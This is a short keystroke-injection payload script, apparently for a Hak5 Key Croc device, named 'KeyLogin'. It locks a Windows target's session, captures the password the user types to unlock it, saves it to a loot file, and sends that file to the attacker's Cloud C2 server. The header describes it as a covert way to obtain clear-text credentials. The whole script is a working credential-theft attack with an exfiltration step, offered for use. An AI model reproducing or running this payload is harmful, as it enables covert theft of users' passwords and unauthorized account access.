###############################KeyLogin#####################################
#   Version 1.1
#   OS: Windows
#   Author: 0iphor13
#   Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
#   Afterwards these will be exfiltrated to your CloudC2 instance. The most covert technique to get clear text credentials!
#
####################Defining Language,Trigger & Clean Up#####################
MATCH \[ENTER\]

Q DELAY 2000
export DUCKY_LANG=de
Q DELAY 2000
rm /root/loot/win-pass*

########################Locking User Machine################################

Q LOCK
Q DELAY 500
Q GUI l
C2NOTIFY INFO 'Locked Users Machine!'
Q DELAY 250
Q DELETE
Q DELAY 250
Q UNLOCK
WAIT_FOR_KEYBOARD_ACTIVITY 1
#######Define until which point you want to intercept the keystrokes########
SAVEKEYS /root/loot/win-pass.txt NEXT 4
Q DELAY 2000
while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done

#####################Exfiltrating Credentials###############################

C2EXFIL /root/loot/win-pass.txt
Q DELAY 1000
C2NOTIFY INFO 'User Credentials Received!'

#You may want to delete or disable to payload after execution to avoid endless logout processes
#rm /root/udisk/payloads/KeyLogin.txt
